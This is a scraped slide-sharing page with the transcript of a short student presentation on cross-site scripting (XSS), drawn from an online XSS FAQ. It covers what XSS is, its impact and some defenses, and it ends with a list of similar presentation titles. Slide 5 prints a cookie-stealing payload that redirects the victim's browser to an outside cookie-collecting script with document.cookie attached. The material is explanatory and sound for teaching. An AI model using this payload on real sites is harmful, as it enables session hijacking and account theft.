Presentation is loading. Please wait.

Presentation is loading. Please wait.

Information Systems Security LAÏMOUCHE El Hadj, DAVY Benjamin 1source :

Published byHarold Watkins Modified over 9 years ago

Similar presentations

Presentation on theme: "Information Systems Security LAÏMOUCHE El Hadj, DAVY Benjamin 1source :"— Presentation transcript:

1 Information Systems Security LAÏMOUCHE El Hadj, DAVY Benjamin 1source : http://www.cgisecurity.com/articles/xss-faq.shtml

2  Users data gathered by a website.  Using malicious code hidden in links, posts on a board or e-mails.  Encoded to be less suspicious : e.g. in HEX. 2source : http://www.cgisecurity.com/articles/xss-faq.shtml

3  Often people refer to Cross Site Scripting as CSS.  CSS is also used for Cascading Style Sheets.  When you see XSS you can be sure it’s talking about the security threat. source : http://www.cgisecurity.com/articles/xss-faq.shtml3

4  Injection of JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable application to fool a user.  Account, users settings, cookie theft, false advertising is possible. source : http://www.cgisecurity.com/articles/xss-faq.shtml4

5  Target a website using cookies.  Test how it works and where it’s possible to insert code (e.g. enabled HTML in a form).  Javascript code : http://host/a.php?variable="> document.location='ht tp://www.cgisecurity.com/cgi-bin/cookie.cgi? '%20+document.cookie source : http://www.cgisecurity.com/articles/xss-faq.shtml5

6  Follow links from the main website.  Be careful XSS can be executed automatically when you open an e-mail, read a guestbook …  Turn off javascript.  Encryption is useless. source : http://www.cgisecurity.com/articles/xss-faq.shtml6

7  Websites from FBI.gov, CNN.com, Time.com, Ebay, Yahoo, Apple computer, Microsoft, Zdnet, Wired, and Newsbytes have all had one form or another of XSS bugs.  10-25 XSS holes are found every month. source : http://www.cgisecurity.com/articles/xss-faq.shtml7

8  Any questions ? source : http://www.cgisecurity.com/articles/xss-faq.shtml8

Download ppt "Information Systems Security LAÏMOUCHE El Hadj, DAVY Benjamin 1source :"

Similar presentations

Module XII Web Application Vulnerabilities

Module XII Web Application Vulnerabilities
Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.
Nick Feamster CS 6262 Spring 2009

Nick Feamster CS 6262 Spring 2009
Cross-Site Scripting (XSS) Vulnerability in AJAX and Adobe Flex Applications Danielle Cauthen 04/09/2010 COMS E6125 – Web enHanced Information Management.

Cross-Site Scripting (XSS) Vulnerability in AJAX and Adobe Flex Applications Danielle Cauthen 04/09/2010 COMS E6125 – Web enHanced Information Management.
Cross-Site Scripting CSCD 498/539 Secure Coding Principles Amazing Legion of Fuzzy Backdoor Intruder Worms Bryan Smith Allen Greaves Zach Moore Rebecca.

Cross-Site Scripting CSCD 498/539 Secure Coding Principles Amazing Legion of Fuzzy Backdoor Intruder Worms Bryan Smith Allen Greaves Zach Moore Rebecca.
What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.

What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.
HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.

HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.
Attacking and defending Flash Applications. Flash Security I’ll talk about; o RIA, Web 2.0 and Security o What is Crossdomain.xml? Why does it exist?

Attacking and defending Flash Applications. Flash Security I’ll talk about; o RIA, Web 2.0 and Security o What is Crossdomain.xml? Why does it exist?
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.

Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.
17 th ACM CCS (October, 2010).  Introduction  Threat Model  Cross-Origin CSS Attacks  Example Attacks  Defenses  Experiment  Related Work 2 A Presentation.

17 th ACM CCS (October, 2010).  Introduction  Threat Model  Cross-Origin CSS Attacks  Example Attacks  Defenses  Experiment  Related Work 2 A Presentation.
By Philipp Vogt, Florian Nentwich, Nenad Jovanovic, Engin Kirda, Christopher Kruegel, and Giovanni Vigna Network and Distributed System Security(NDSS ‘07)

By Philipp Vogt, Florian Nentwich, Nenad Jovanovic, Engin Kirda, Christopher Kruegel, and Giovanni Vigna Network and Distributed System Security(NDSS ‘07)
EECS 354 Network Security Cross Site Scripting (XSS)

EECS 354 Network Security Cross Site Scripting (XSS)
Team Members: Brad Stancel,

Team Members: Brad Stancel,
Cross Site Scripting a.k.a. XSS Szymon Siewior. Disclaimer Everything that will be shown, was created for strictly educational purposes. You may reuse.

Cross Site Scripting a.k.a. XSS Szymon Siewior. Disclaimer Everything that will be shown, was created for strictly educational purposes. You may reuse.
V. Beyond HTML: CSS, JavaScript, Plug-ins A Web Accessibility Primer: Usability for Everyone Office of Web Communications.

V. Beyond HTML: CSS, JavaScript, Plug-ins A Web Accessibility Primer: Usability for Everyone Office of Web Communications.
Nozzle: A Defense Against Heap-spraying Code Injection Attacks Paruj Ratanaworabhan, Cornell University Ben Livshits and Ben Zorn, Microsoft Research (Redmond,

Nozzle: A Defense Against Heap-spraying Code Injection Attacks Paruj Ratanaworabhan, Cornell University Ben Livshits and Ben Zorn, Microsoft Research (Redmond,
Phishing: When Attacks Get Embedded in Legitimate Websites Live Webinar May 26, 2005 Live Webinar May 26, 2005.

Phishing: When Attacks Get Embedded in Legitimate Websites Live Webinar May 26, 2005 Live Webinar May 26, 2005.
Define objects and their relationships to multimedia Explain the fundamentals of C, C++, Java, JavaScript, JScript, C#, ActiveX and VBScript Discuss security.

Define objects and their relationships to multimedia Explain the fundamentals of C, C++, Java, JavaScript, JScript, C#, ActiveX and VBScript Discuss security.
CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?

CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?
Lab 3 Cookie Stealing using XSS Kara James, Chelsea Collins, Trevor Norwood, David Johnson.

Lab 3 Cookie Stealing using XSS Kara James, Chelsea Collins, Trevor Norwood, David Johnson.

Similar presentations

Ads by Google